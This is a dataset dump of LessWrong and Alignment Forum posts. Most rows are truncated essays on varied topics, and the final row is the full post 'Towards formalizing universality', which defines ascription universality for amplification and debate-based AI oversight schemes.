id stringlengths 36 36 | source stringclasses 15 values | formatted_source stringclasses 13 values | text stringlengths 2 7.55M |
|---|---|---|---|
72242a05-8758-46dc-b3c3-9ebdda967220 | trentmkelly/LessWrong-43k | LessWrong | In the presence of disinformation, collective epistemology requires local modeling
In Inadequacy and Modesty, Eliezer describes modest epistemology:
> How likely is it that an entire country—one of the world’s most advanced countries—would forego trillions of dollars of real economic growth because their monetary controllers—not politicians, but appointees from the professional elite—were doing something so wrong that even a non-professional could tell? How likely is it that a non-professional could not just suspect that the Bank of Japan was doing something badly wrong, but be confident in that assessment?
> Surely it would be more realistic to search for possible reasons why the Bank of Japan might not be as stupid as it seemed, as stupid as some econbloggers were claiming. Possibly Japan’s aging population made growth impossible. Possibly Japan’s massive outstanding government debt made even the slightest inflation too dangerous. Possibly we just aren’t thinking of the complicated reasoning going into the Bank of Japan’s decision.
> Surely some humility is appropriate when criticizing the elite decision-makers governing the Bank of Japan. What if it’s you, and not the professional economists making these decisions, who have failed to grasp the relevant economic considerations?
> I’ll refer to this genre of arguments as “modest epistemology.”
I see modest epistemology as attempting to defer to a canonical perspective: a way of making judgments that is a Schelling point for coordination. In this case, the Bank of Japan has more claim to canonicity than Eliezer does regarding claims about Japan's economy. I think deferring to a canonical perspective is key to how modest epistemology functions and why people find it appealing.
In social groups such as effective altruism, canonicity is useful when it allows for better coordination. If everyone can agree that charity X is the best charity, then it is possible to punish those who do not donate to charity X. This is similar to law: if a legal court makes a judgment that is not overturned, that ju |
6bb991c1-93c8-4f2d-9679-3c62c80805a9 | trentmkelly/LessWrong-43k | LessWrong | central planning is intractable (polynomial, but n is large)
Three Toed Sloth has a nice exposition on the difficulties of optimizing an economy, including the best explanation of convex optimization ever:
> If plan A calls for 10,000 diapers and 2,000 towels, and plan B calls for 2,000 diapers and 10,000 towels, we could do half of plan A and half of plan B, make 6,000 diapers and 6,000 towels, and not run up against the constraints. |
ab45464d-dbc4-4cdc-8bf7-241076233ccd | trentmkelly/LessWrong-43k | LessWrong | Creating The Simple Math of Everything
Eliezer once proposed an Idea for a book, The Simple Math of Everything. The basic idea is to compile articles on the basic mathematics of a wide variety of fields, but nothing too complicated.
> Not Jacobean matrices for frequency-dependent gene selection; just Haldane's calculation of time to fixation. Not quantum physics; just the wave equation for sound in air. Not the maximum entropy solution using Lagrange Multipliers; just Bayes's Rule.
Now, writing a book is a pretty daunting task. Luckily brian_jaress had the idea of creating an index of links to already available online articles. XFrequentist pointed out that something like this has been done before over at Evolving Thoughts. This initially discourage me, but it eventually helped me refine what I thought the index should be. A key characteristic of Eliezer's idea is that it should be worthwhile for someone who doesn't know the material to read the entire index. Many of the links at evolving thoughts point to rather narrow topics that might not be very interesting to a generalist. Also there is just plain a ton of stuff to read over there - at least 100 articles.
So we should come up with some basic criteria for the articles. Here is what I suggest (let me know what you think):
1. The index must be short: say 10 - 20 links. Or rather, the core of the index must be short. We can have longer lists of narrower and more in depth articles for people who want to get into more detail about, say, quantum physics or economic growth. But these should be separate from the main index.
2. Each article must meet minimum requirements in terms of how interesting the topic is and how important it is. Remember, this is an index for the reader to gain a general understanding of many fields
3. The article must include some math - at minimum, some basic algebra. Calculus is good as long as it significantly adds to the article. In fact, this should probably be the basic rule for all additions of complex mat |
1a7a3248-3496-4151-87b2-b0f6c942a801 | trentmkelly/LessWrong-43k | LessWrong | Boston MA: Optimal Philanthropy Meetup (July 6th)
Julia and I have done a lot of thinking and writing about how to do the most good in the world [1] [2] but we don't have things all figured out. We'd love to talk to other people interested in optimal philanthropy, so if you're in the Boston area on Friday July 6th we'd love to have you over for dinner and discussion.
Details:
* RSVP for directions (West Medford)
* 6pm to about 9pm
* 94 bus from the red line, 95 bus from the orange line.
* We can give rides back into the city at the end of the evening.
* RSVPs would be nice; let us know if you have dietary restrictions.
[1] Julia's blog: givinggladly.com
[2] Jeff's posts on giving: jefftk.com/giving |
5e434b4d-4d88-4cd3-836a-cba1bd600060 | trentmkelly/LessWrong-43k | LessWrong | Schizophrenia as a deficiency in long-range cortex-to-cortex communication
(Written in a hurry. I was almost going to title this “My poorly-researched pet theory of schizophrenia”. Hoping for feedback and pointers to relevant prior literature. I am very far from a schizophrenia expert. Really. I cannot emphasize this enough. Like, if I took an undergraduate psych test on schizophrenia right now, I might well flunk it.)
1. What’s my hypothesis?
My hypothesis is that the root cause of schizophrenia is (…drumroll…) a deficiency in medium- to long-range cortex-to-cortex connections. Some elaboration:
* When I say “deficiency”, I mean either “the connections aren’t there in their normal numbers” or “the connections are there, but for some reason they’re not accomplishing what they accomplish in neurotypical people”.
* When I say “cortex-to-cortex connections”, I think the main culprit is direct connections between Cortex Region A and Cortex Region B, but it’s also possible that the relevant thing is indirect connections between Cortex Region A and Cortex Region B, e.g. via the thalamus or cerebellum.
* When I say “medium- to long-range”, this definitely includes e.g. connections between different lobes, and it probably also includes connections across a few centimeters of cortex in humans. I haven’t really thought about what would happen if there was a deficiency in all connections of any length, including the very short ones, but I would weakly guess that this would present as schizophrenia as well.
2. How did I originally come up with that hypothesis?
I can pinpoint the exact moment: I was reading about visual processing abnormalities in schizophrenia, and more specifically the paper Weak Suppression of Visual Context in Chronic Schizophrenia (Dakin, Carlin, Hemsley 2005). They showed people pictures like this:
The task was to match the image contrast in the red circle to one of the circles on the left. The eye-popping results were:
1. the schizophrenics did better than the control group,
2. …with a p-value of 0.0000002!
3. Indee |
a5afb94d-176d-4c38-af3e-37ba63aad7dd | trentmkelly/LessWrong-43k | LessWrong | Firming Up Not-Lying Around Its Edge-Cases Is Less Broadly Useful Than One Might Initially Think
Reply to: Meta-Honesty: Firming Up Honesty Around Its Edge-Cases
Eliezer Yudkowsky, listing advantages of a "wizard's oath" ethical code of "Don't say things that are literally false", writes—
> Repeatedly asking yourself of every sentence you say aloud to another person, "Is this statement actually and literally true?", helps you build a skill for navigating out of your internal smog of not-quite-truths.
I mean, that's one hypothesis about the psychological effects of adopting the wizard's code.
A potential problem with this is that human natural language contains a lot of ambiguity. Words can be used in many ways depending on context. Even the specification "literally" in "literally false" is less useful than it initially appears when you consider that the way people ordinarily speak when they're being truthful is actually pretty dense with metaphors that we typically don't notice as metaphors because they're common enough to be recognized legitimate uses that all fluent speakers will understand.
For example, if I want to convey the meaning that our study group has covered a lot of material in today's session, and I say, "Look how far we've come today!" it would be pretty weird if you were to object, "Liar! We've been in this room the whole time and haven't physically moved at all!" because in this case, it really is obvious to all ordinary English speakers that that's not what I meant by "how far we've come."
Other times, the "intended"[1] interpretation of a statement is not only not obvious, but speakers can even mislead by motivatedly equivocating between different definitions of words: the immortal Scott Alexander has written a lot about this phenomenon under the labels "motte-and-bailey doctrine" (as coined by Nicholas Shackel) and "the noncentral fallacy".
For example, Zvi Mowshowitz has written about how the claim that "everybody knows" something[2] is often used to establish fictitious social proof, or silence those attempting to tell the thing to |
397bbf0e-c179-4d2e-9413-676f10d118f4 | trentmkelly/LessWrong-43k | LessWrong | Preference Inversion
Sometimes the preferences people report or even try to demonstrate are better modeled as a political strategy and response to coercion, than as an honest report of intrinsic preferences. Modeling this correctly is important if you want to try to efficiently satisfy others' intrinsic preferences, or even your own. So I'm sharing something I wrote on the topic elsewhere.
You asked why people who "believe in" avoiding nonmarital sex so frequently engage in and report badly regretting it. Instead of responding within your frame, I'm going to lay out the interpretive framework that seems most natural to me to use for this problem, and then answer in those terms.
We can call things or actions good or bad, right or wrong, with reference to some intention that both the speaker and listener have in mind. For instance, a sturdier and sharper knife is a better one, because our uses for knives tend to converge. We can expect to be understood when we call some knives "good" and leave out "for cutting," and likewise when we call spoiled food bad without reference to a shared interest, because it harms the body of the eater, which harm we generally expect animals to try to avoid.
Moral injunctions such as "it is wrong to lie," "it is bad to steal," can diverge from the local interests of the organism being admonished, in service of a larger, convergent goal. By abstaining from some narrowly self-interested behaviors now, we preserve the necessary conditions for our needs to be met in the future, and the relation between the costs and the benefits can in principle be explained within the system of reference that judges actions as good or bad.
Not all injunctions are like this. For instance, reproduction is such a large component of inclusive fitness that it's not clear what good an organism could get to compensate it for forgoing reproduction. If, like the early Essenes or Christians, we judge sexual desire and activity to be simply bad, we cannot explain this inside the moral |
28106ea1-2667-4d98-bfd2-305b4eeba0d6 | trentmkelly/LessWrong-43k | LessWrong | Economics of Bitcoin
I haven't read/listened to them, but I thought these might be interesting to the local bitcoin users:
Eli Dourado (GMU econ PhD candidate) on the economics of cryptocurrency.
Econtalk podcast - Russ Roberts (GMU econ prof) with Gavin Andresen, Principal of the BitCoin Virtual Currency Project on, Virtual Currency.
Roberts' podcast is always stimulating even if I disagree with him, and Eli is a pretty insightful guy who I've met in meatspace.
|
2843c1f6-1108-41b9-b0d6-3a0a7cdc692b | trentmkelly/LessWrong-43k | LessWrong | The man and the tool
The man and the first tools
150,000 years ago there were Homo Sapiens very similar to us in Africa. However, they did not begin to dominate the world until about 70,000 years ago. Between 150,000 and 70,000 years ago, Homo Sapiens was just another animal that struggled to survive, a weak and clumsy animal, and not the animal that it is today, the dominant animal on planet Earth.
Between 70,000 and 30,000 years ago, Homo Sapiens started making cool things like boats, oil lamps, bows and arrows, and needles. These achievements are thought to have been the product of a revolution in the cognitive abilities of Sapiens. There are different theories of the cause of what is known as the cognitive revolution. Although it is interesting to investigate the causes of the cognitive revolution, it is also interesting to analyze its consequences.
The creation and use of tools by humans did not begin 70,000 years ago. The human being and his ancestors have been creating and using tools for millions of years. The first tools used by our human ancestors were stones, and this fact marked the beginning of what we know as the Stone Age. The Stone Age began approximately 3 million years ago and ended when metals were discovered and used. Stone tools were made by gradually grinding away stones to make hammers, spear and arrow points, knives, and scrapers.
The progress of the tools of the human being is evident, 3 million years ago we had stones and now we have rockets and spaceships. It seems that there is a correlation between the tools of man and the evolution of man. The evolution of the human produced tools and the production of tools made the human progress. The use of tools leverages us, amplifies our capabilities. The tools are what we currently call technology.
A scene from a movie that I find fascinating about the tools of man is from the movie 2001: A Space Odyssey. I am fascinated by the contrast it makes between bone, a primitive tool, and a spaceship, the pinnacle of hum |
35624a6e-a63a-435b-94c0-a2814583b53f | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Towards formalizing universality
(*[Cross-posted at ai-alignment.com](https://ai-alignment.com/towards-formalizing-universality-409ab893a456)*)
The scalability of [iterated amplification](https://arxiv.org/pdf/1810.08575.pdf) or [debate](https://arxiv.org/abs/1805.00899) seems to depend on whether large enough teams of humans can carry out arbitrarily complicated reasoning. Are these schemes “universal,” or are there kinds of reasoning that work but which humans fundamentally can’t understand?
This post defines the concept of “ascription universality,” which tries to capture the property that a question-answering system **A** is better-informed than any particular simpler computation **C**.
[These](https://ai-alignment.com/informed-oversight-18fcb5d3d1e1) [parallel](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) [posts](https://ai-alignment.com/universality-and-model-based-rl-b08701394ddd) explain why I believe that the alignment of iterated amplification largely depends on whether HCH is ascription universal. Ultimately I think that the “right” definition will be closely tied to the use we want to make of it, and so we should be refining this definition in parallel with exploring its applications.
I’m using the awkward term “ascription universality” partly to explicitly flag that this is a preliminary definition, and partly to reserve linguistic space for the better definitions that I’m optimistic will follow.
(Thanks to Geoffrey Irving for discussions about many of the ideas in this post.)
**I. Definition**
=================
We will try to define what it means for a question-answering system **A** to be “ascription universal.”
**1. Ascribing beliefs to A**
-----------------------------
Fix a language (e.g. English with arbitrarily big compound [terms](https://ai-alignment.com/approval-directed-algorithm-learning-bf1f8fad42cd)) in which we can represent questions and answers.
To ascribe beliefs to **A**, we ask it. If **A**(“are there infinitely many twin primes?”) = “probably, though it’s hard to be sure” then we ascribe that belief about twin primes to **A**.
This is not a general way of ascribing “belief.” This procedure wouldn’t capture the beliefs of a native Spanish speaker, or for someone who wasn’t answering questions honestly. But it can give us a sufficient condition, and is particularly useful for someone who wants to use **A** as part of an alignment scheme.
Even in this “straightforward” procedure there is a lot of subtlety. In some cases there are questions that we can’t articulate in our language, but which (when combined with **A**’s other beliefs) have consequences that we can articulate. In this case, we can infer something about **A**’s beliefs from its answers to the questions that we can articulate.
**2. Ascribing beliefs to arbitrary computations**
--------------------------------------------------
We are interested in whether **A** “can understand everything that could be understood by someone.” To clarify this, we need to be more precise about what we mean by “could be understood by someone.”
This will be the most informal step in this post. (Not that any of it is very formal!)
We can imagine various ways of ascribing beliefs to an arbitrary computation **C**. For example:
* We can give **C** questions in a particular encoding and assume its answers reflect its beliefs. We can either use those answers directly to infer **C**’s beliefs (as in the last section), or we can ask what set of beliefs about latent facts would explain **C**’s answers.
* We can view **C** as optimizing something and ask what set of beliefs rationalize that optimization. For example, we can give **C** a chess board as input, see what move it produces, assume it is trying to win, and infer what it must believe. We might conclude that **C** believes a particular line of play will be won by black, or that **C** believes general heuristics like “a pawn is worth 3 tempi,” or so on.
* We can reason about how **C**’s behavior depends on facts about the world, and ask what state of the world is determined by its current behavior. For example, we can observe that **C**(113327) = 1 but that **C**(113327) “would have been” 0 if 113327 had been composite, concluding that **C**(11327) “knows” that 113327 is prime. We can extend to probabilistic beliefs, e.g. if **C**(113327) “probably” would have been 0 if 113327 had been composite, then we might that **C** knows that 113327 is “probably prime.” This certainly isn’t a precise definition, since it involves considering logical counterfactuals, and I’m not clear whether it can be made precise. (See also ideas along the lines of [“knowledge is freedom”](https://www.lesswrong.com/posts/b3Bt9Cz4hEtR26ANX/knowledge-is-freedom).)
* If a computation behaves differently under different conditions, then we could use restrict attention to a particular condition. For example, if a question-answering system appears to be bilingual but answers questions differently in Spanish and English, we could ascribe two different sets of beliefs. Similarly, we could ascribe beliefs to any subcomputation. For example, if a part of **C** can be understood as optimizing the way data is laid out in memory, then we can ascribe beliefs to that computation about the way that data will be used.
Note that these aren’t intended to be efficient procedures that we could actually apply to a given computation **C**. They are hypothetical procedures that we will use to define what it means for **A** to be universal.
I’m not going to try to ascribe a single set of beliefs to a given computation; instead, I’ll consider all of the reasonable ascription procedures. For example, I think different procedures would ascribe different beliefs to a particular human, and don’t want to claim there is a unique answer to what a human “really” believes. A universal reasoner needs to have more reasonable beliefs than the beliefs ascribed to that a human using any particular method.
An ascription-universal reasoner needs to compete with any beliefs that can be ascribed to **C**, so I want to be generous with this definition. For example, given a chess-playing algorithm, we might rationalize it as trying to win a game and infer its beliefs about the rules of chess. Or we might rationalize it as trying to look like a human and infer its beliefs about what a human would do. Or something different altogether. Most of these will be kind of crazy ascriptions, but I want to compete with them anyway (competing with crazier beliefs will turn out to just be easier).
It’s not totally clear what counts as a “reasonable” ascription procedure, and that’s the biggest source of informality. Intuitively, the key property is that the ascription itself isn’t doing the “hard work.” In practice I’m using an informal extensional definition, guided by examples like those in the bulleted list.
**3. Comparing beliefs**
------------------------
What does it mean to say that one agent is “better-informed” than another?
It’s natural to try to express this in terms of empirical information about the world, but we are particularly interested in the different inferences that agents are able to draw from the same data. Another natural approach is to compare their “knowledge,” but I have no idea how to define knowledge or justified belief. So I’m reduced to working directly with sets of beliefs.
Consider two sets of beliefs, described by the subjective expectations 𝔼¹ and 𝔼². What does it mean to say that 𝔼¹ is better-informed than 𝔼²?
This framing makes it tempting to try something simple: “for every quantity, 𝔼¹’s belief about that quantity is more accurate.” But this is property is totally unachievable. Even if 𝔼¹ is obtained by conditioning 𝔼² on a true fact, it will almost certainly happen to update in the “wrong” direction for some claims.
We will instead use a subjective definition, i.e. we’ll define this concept from a particular epistemic position represented by another subjective expectation 𝔼.
Then we say that 𝔼¹ **dominates** 𝔼² (w.r.t. 𝔼) if, for every bounded quantity X and for every “nice” property Φ:
* 𝔼[X|Φ(𝔼¹, 𝔼²)] = 𝔼[𝔼¹[X]|Φ(𝔼¹, 𝔼²)]
(By “nice” I mean something like: simple to define and open in the product topology, viewing 𝔼¹ and 𝔼² as infinite tables of numbers.)
Intuitively, this means that 𝔼 always “trusts” 𝔼¹, even if given arbitrary information about 𝔼¹ and 𝔼². For example, if 𝔼 was told that 𝔼¹[X] ≈ *x* and
𝔼²[X] ≈ *y*, then it would expect X to be around *x* (rather than *y*)*.* Allowing arbitrary predicates Φ allows us to make stronger inferences, effectively that 𝔼 thinks that 𝔼¹ captures *everything* useful about 𝔼².
I’m not sure if this is exactly the right property, and it becomes particularly tricky if the quantity X is itself related to the behavior of 𝔼¹ or 𝔼² (continuity in the product topology is the minimum plausible condition to avoid a self-referential paradox). But I think it’s at least roughly what we want and it may be exactly what we want.
Note that dominance is *subjective*, i.e. it depends on the epistemic vantage point 𝔼 used for the outer expectation. This property is a little bit stronger than what we originally asked for, since it also requires 𝔼 to trust 𝔼¹, but this turns out to be implied anyway by our definition of universality so it’s not a big defect.
Note that dominance is a property of the *descriptions* of 𝔼¹ and 𝔼². There could be two different computations that in fact compute the same set of expectations, such that 𝔼 trusts one of them but not the other. Perhaps one computation hard-codes a particular result, while the other does a bunch of work to estimate it. Even if the hard-coded result happened to be correct, such that the two computations had the same outputs, 𝔼 might trust the hard work but not the wild guess.
**4. Complexity and parameterization**
--------------------------------------
There are computations with arbitrarily sophisticated beliefs, so no fixed **A**can hope to dominate everything. To remedy this, rather than comparing to a fixed question-answerer **A**, we’ll compare to a parameterized family **A**[**C**].
I’ll consider two different kinds of potentially-universal reasoners **A**:
* In the “idealized” case, **A**[**C**] depends only on the complexity of **C**.
For example, we might hope that an *n*-round debate dominates any beliefs that could be ascribed to a fast computation with (*n*-1) rounds of [alternation](https://en.wikipedia.org/wiki/Alternating_Turing_machine). In particular, this **A**[**C**] is the same for any two computations **C**of the same complexity.
* In the “practical” case, **A**[**C**] depends on the complexity of **C** but also uses the computation **C** as a hint. For example, if **C** is the training process for a neural net, then we might take **A**[**C**] to be a debate in which the debaters are able to share weights and activations with the neural net throughout the entire training process.
I’m generally interested in the case where **A**[**C**] is only slightly more powerful than **C** itself. This mirrors the setting where a universal Turing machine is able to run any other Turing machine with only a modest slowdown.
**Putting it all together**
---------------------------
We say that a set of beliefs 𝔼ᴬ *epistemically dominates* a computation **C** (w.r.t. some beliefs 𝔼 and language L) if the beliefs ascribed to A by the “straightforward” procedure, using L, dominate (w.r.t. 𝔼) the beliefs ascribed to **C** by any reasonable ascription procedure.
We say that a family of question-answering systems **A**[**·**] are *ascription universal* (w.r.t. 𝔼 and L) if **A**[**C**] epistemically dominates **C** for every computation **C**.
**II. Discussion**
==================
**Why is (subjective) dominance sufficient?**
---------------------------------------------
This universality condition requires that *we* believe that **A**[**C**] is better-informed than **C**. Naively we might have wanted it to *actually* be the case that **A**[**C**] is better-informed than **C**; the stronger condition is clearly unachievable, but why should we be satisfied with the weaker condition?
In [applications](https://ai-alignment.com/informed-oversight-18fcb5d3d1e1) [of this](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) [property](https://ai-alignment.com/universality-and-model-based-rl-b08701394ddd), the subjective condition is what we need in order for *us* to believe that **A**[**C**] will cope with the challenges posed by **C**. For example, suppose that **C** formulates a plan to “trick” **A**[**C**]. Then the subjective universality condition implies that we don’t expect **C** to succeed.
This isn’t as good as actually knowing that **C** won’t succeed. But I think it should be good enough for us — the reason we are thinking about AI safety is because we are concerned that something bad will happen. If we find a technique that defuses this argument, then we’ve addressed the motivating problem. It may still be the case that bad things happen (and we should still search for additional reasons that bad things might happen), but we don’t particularly expect them to.
Of course if you select over a large number of computations, then you may find one that will succeed in tricking **A**. But if we are concerned about that, then we can instead apply ascription universality to the entire process including the selection.
**Why trust opaque computation?**
---------------------------------
If **C** uses some clever heuristics that I don’t understand, then **C**’s “beliefs” might be excellent, but I might not *expect* them to be excellent. In this sense understanding may seem almost vacuous. If there is some heuristic that I trust, wouldn’t **A** just use it?
To see why the definition is demanding, consider the special case where **C**performs an extensive search to find a computation that works well empirically. For example, **C** might be the following computation:
* Start with a training set of (image, label) pairs.
* Search over simple programs to find one that makes good predictions.
* Run that simple program on a new image to predict its label.
In this case, we can ascribe beliefs to **C** about the contents of the new image. And because those beliefs are coming from a simple program that works empirically, I expect them to be accurate (in some respects).
For example, a simple classifier **C** may “believe” that the new image contains a particular curve that typically appears in images labeled “dog;” or a really sophisticated classifier may perform complex deductions about the contents of the scene, starting from premises that were empirically validated on the training set.
So it’s not OK for **A** to simply ignore whatever heuristics **C** is using — if those heuristics have the kind of empirical support that makes us think they actually work, then A needs to be able to understand everything that those heuristics imply about the domain.
**Why be so general?**
----------------------
I’ve formulated universality as competing with arbitrary computations **C**. It seems totally possible that the form of **C** discussed in the last section — searching for a program that works well in practice and then using it in a new situation — is so central that the definition of universality should focus entirely on it.
One reason to use the broader definition is because sometimes this “selection” process can be embedded in a non-trivial way in a larger computation. For example, if I have a sufficiently large group of humans, I might expect memetic selection to occur and produce systems that could be said to have “beliefs,” and I’d like universal systems to dominate those beliefs as well.
The other reason to use this very general definition is because I don’t see an easy way to simplify the definition by using the additional structural assumption about **C**. I do think it’s likely there’s a nicer statement out there that someone else can find.
**Universal from whose perspective?**
-------------------------------------
Unfortunately, achieving universality depends a lot on the epistemic perspective 𝔼 from which it is being evaluated. For example, if 𝔼 knows any facts, than a universal agent must know all of those facts as well. Thus “a debate judged by Paul” may be universal from Paul’s perspective, but “a debate arbitrated by Alice” cannot be universal from my perspective unless I believe that Alice knows everything I know.
This isn’t necessarily a big problem. It will limit us to conclusions like: Google engineers believe that the AI they’ve built serves the user’s interests reasonably well. The user might not agree with that assessment, if they have different beliefs from Google engineers. This is what you’d expect in any case where Google engineers build a product, however good their intentions.
(Of course Google engineers’ notion of “serving the user’s interests” can involve deferring to the user’s beliefs in cases where they disagree with Google engineers, just as they could defer to the user’s beliefs with other products. That gives us reason to be less concerned about such divergences, but eventually these evaluations do need to bottom out somewhere.)
This property becomes more problematic when we ask questions like: is there a way to [seriously limit the inputs and outputs to a human while preserving universality of HCH](https://ai-alignment.com/universality-and-security-amplification-551b314a3bab)? This causes trouble because even if limiting the human intuitively preserves universality, it will effectively eliminate some of the human’s knowledge and know-how that can [only be accessed on large inputs](https://medium.com/@weidai/to-put-it-another-way-a-human-translator-has-learned-a-lot-of-valuable-information-much-of-it-48457f95b9bf), and hence violate universality.
So when investigating schemes based on this kind of impoverished human, we would need to evaluate universality from some impoverished epistemic perspective. We’d like to say that the impoverished perspective is still “good enough” for us to feel safe, despite not being good enough to capture literally everything we know. But now we risk begging the question: how do we evaluate whether the impoverished perspective is good enough? I think this is probably OK, but it’s definitely subtle.
I think that defining universality w.r.t. 𝔼 is an artifact of this definition strategy, and I’m optimistic that a better definition wouldn’t have this dependence, probably by directly attacking the notion of “justified” belief (which would likely also be useful for actually establishing universality, and may even be necessary). But that’s a hard problem. Philosophers have thought about very similar problems extensively without making the kind of progress that seems adequate for our purposes, and I don’t see an immediate angle of attack.
**III. Which A might be universal?**
====================================
**Two regimes**
---------------
I’m interested in universality in two distinct regimes:
* Universality of idealized procedures defined in terms of perfect optimization, such as [debate](https://arxiv.org/abs/1805.00899) under optimal play or [max-HCH](https://ai-alignment.com/humans-consulting-hch-f893f6051455), where **A**[**C**] depends only the computational complexity of **C**.
* Universality of practical variants, in which the perfect optimization is replaced by a bounded optimization, which might use the computation **C**as a “hint.” For example, we might consider amplification or debate where the agents are allowed to inspect a transcript of **C**; or if **C** is a neural net training process, we might train them jointly with **C**.
**Idealized models**
--------------------
**A**[**C**] could be:
* A debate, judged by a human, with perfect debaters, whose length depends on the complexity of **C**. (Hopefully in such a way that **A**[**A**[**C**]] is only a slightly longer debate than **A**[**C**].)
* max-HCH, using perfect optimization rather than a bounded optimizer. Again, we can impose a budget limit that depends on the complexity of **C**, ideally such that **A**[**A**[**C**]] does not involve a much larger computation than **A**[**C**].
* Use HCH to implement two functions, Info and Answer. Define **A**[**C**](Q) to be Answer(Q, *a\**)*,* where *a\* =* argmax Info(*a*, Q*),* and the optimization is over advice strings *a* of length comparable to the description of **C**.
I don’t think any of these would be universal if instantiated with an open-ended human policy — providing arbitrary complex inputs to a human is likely to lead to bad behavior. Instead, I imagine restricting the human to some small enough space of inputs that they can behave “reasonably” over the whole space, while still being rich enough to be universal. Even as such, I think [additional measures](https://ai-alignment.com/universality-and-consequentialism-within-hch-c0bee00365bd) might be needed to achieve security (since a team of humans may behave badly in some exotic corners of the input space, even if individual humans are sheltered from exotic inputs).
**Practical models**
--------------------
In practice I’m particularly interested in the case where **C** has the special form described in the “Trusting opaque computations” section: it trains a neural net on some dataset, and then runs that neural network on new inputs.
**A**[**C**] could be:
* Debates arbitrated by a human where the debaters are trained jointly with **C**, and can make references to individual examples from the dataset.
* max-HCH where the agent is trained jointly with **C**, and the overseer can consult individual entries from the dataset.
* HCH, combined with interpretability techniques that allow it to get information about what **C** is thinking and to relate its behavior to the dataset on which it was trained.
For each of these practical variants, I don’t expect it to be universal unless the corresponding idealized model is. So we can think of dividing the universality question into two pieces:
* Would our procedure be universal *if the optimization was performed perfectly*?
* Is weight sharing / interpretability strong enough to solve the optimization problems needed for universality?
I think none of the suggestions in this section are plausibly universal without some additional mechanisms, and so even if HCH or debate is universal, additional ideas are needed in order to translate those to practical universal systems. I’m still inclined to focus on the idealized case, because I want to better understand what is needed for universality without thinking about algorithmic difficulties.
**IV. Which C are hard to epistemically dominate?**
===================================================
The definition in this post was somewhat informal, but the discussion in this appendix will be extremely informal. The purpose is to communicate some of my early thinking about universality and my sense for what a universal reasoner might look like.
The first three examples will consider programs **C** with the following form:
* Iterate over programs to find an *f* that successfully predicts the answers to some dataset of historical questions for which we know the answer.
* Use that program to predict the answers to future questions.
The different examples explore features of *f* that might make it difficult to dominate the overall computation.
**Deduction**
-------------
Suppose *f* takes the following form:
* Given a question and context, it performs a short series of deductions from facts in the context, together with some axioms (e.g. “Bob’s eyes are more likely to twitch when he is lying,” the rules of poker, *etc.*)
* When it arrives at answers that constrain the possible answers to the given question, it outputs an answer consistent with those constraints.
We could attribute the statements produced by this process to **C** as beliefs. We expect this set of beliefs to have useful information because it was selected for making correct predictions.
Fortunately, if HCH is able to see the training dataset then it may be able to arrive at similarly accurate views:
* It can compute that P(observations | axioms) is high by following along with the deductive process used by *f .*
* Bayes implies that the axioms are likely to be true (fully capturing the argument which leads us, from our current perspective, to expect them to be true).
* Once HCH knows the axioms are likely to be true, it can follow along with the deductive process to reproduce all of *f*’s beliefs.
**Modeling**
------------
Suppose *f* takes the following form:
* Given a question Q and context, set up a relevant physical situation.
* Use a dynamics model M to predict what will happen at some future time.
* Use the resulting state to answer Q.
We could say that **C** believes everything implied by the outcome of this physical simulation. We expect these beliefs to be accurate because *f* has predicted well in the past.
As in the deduction case, hopefully HCH can compute that P(observations|M is accurate) is high, since it can also compute the consequences of M. Then Bayes implies the dynamics model is accurate, and HCH can use that model to compute physical states.
Inferring all the beliefs from a dynamics model is not trivial though. As an extreme example, if *f* is performing an atom-by-atom simulation of a room, and that room contains Alice and Bob, then we could ascribe extensive beliefs about Alice and Bob to the computation **C**.
(Here we run head on into the fuzziness about what counts as a “reasonable” ascription procedure, but for the moment I’ll assume that some reasonable procedure ascribes beliefs about Alice and Bob to the computation.)
To compete with these ascriptions, HCH needs to infer those high-level beliefs about Alice and Bob from the low-level computation involving atoms. One way to do this is to search over possible “bridging” hypotheses that relate low-level physical facts to high-level facts about the environment. If such a hypothesis can explain additional high-level facts, then a Bayesian can learn that it is true. Similarly, if the bridging hypothesis relates facts about the model to constraints we know from the high-level interpretation, then the Bayesian can potentially use that as evidence. (This kind of reasoning will be discussed in a bit more detail in the next section.)
We could further hope that searching for a bridging hypothesis isn’t much harder than performing the original search over low-level physics, given that the low-level physics needed to explain a bunch of high-level facts and so already must encode some part of that correspondence.
(Note that the “deduction” example in the previous case could also involve alien concepts or models, in which case the same kind of work would be needed.)
**Alien reasoning**
-------------------
In the previous section we described two styles of reasoning we already understand. But there are probably many kinds of reasoning that work well in practice but that would be more alien, and those might be more challenging. This section will explore one example in some detail to try to help anchor our reasoning about the general phenomenon. It will also elaborate on some of the reasoning about “bridging” hypotheses mentioned in the last section.
Suppose that our predictions are always of the same form (e.g. what is the probability the stock market will go up today), and *f* works as follows (the details are long but not very important):
* Find the PSD matrix A with maximum log determinant subject to the constraints in the next bullet points, then output the (0, 0) entry.
* There is an implicit correspondence between the rows/columns of A, and some uncertain properties X(0), X(1), X(2), …. (which we’ll view as 0–1 variables), where X(0) is the property we want to forecast.
* If the (*i*, *j*) entry of A represented the expectation E[X(*i*)X(*j*)], then the matrix would necessarily satisfy a bunch of constraints, which we impose A. For example:
* If the context implies that X(*i*) = 1, then E[X(*i*)X(*j*)] = E[X(*j*)] = E[X(*j*)²], so A(*i*, *j*) = A(*j*, *j*).
* If X(*i*) and X(*j*) together imply X(*k*), then we must have E[X(*i*)X(*j*)] ≤ E[X(*i*)X(*k*)] and hence A(*i*, *j*) ≤ A(*i*, *k*).
* For any constants *a*, *b*, …, E[(*a* X(1) + *b* X(2) + … )²] ≥ 0 — i.e., the matrix A must be PSD.
The chosen matrix A(opt) corresponds to a set of beliefs about the propositions X(*i*), and we can ascribe these beliefs to **C**. Because *f* predicts well, we again expect these beliefs to say something important about the world.
I chose this procedure *f* in part because we can give a kind of argument for why the matrix A(opt) should tend to encode accurate beliefs. But I don’t think that a universal reasoner can make use of that argument:
* Finding the argument that *f* works is an additional problem, beyond finding *f* itself, which might be much harder.
* A comprehensible version of that argument may be much larger than the strategy itself, so even in the idealized cases like debate with perfect optimization, we may need to increase the scale.
* I don’t expect that all “good” reasoning strategies have clean understandable arguments in their favor (and even in this case, if it the scheme worked well it would be largely an empirical fact rather than a consequence of the simple theorems we could prove). I think this kind of example is useful because we can easily imagine a human debate judge not having the argument while still being apparently universal. This makes it a useful analogy for cases where the argument really doesn’t exist.
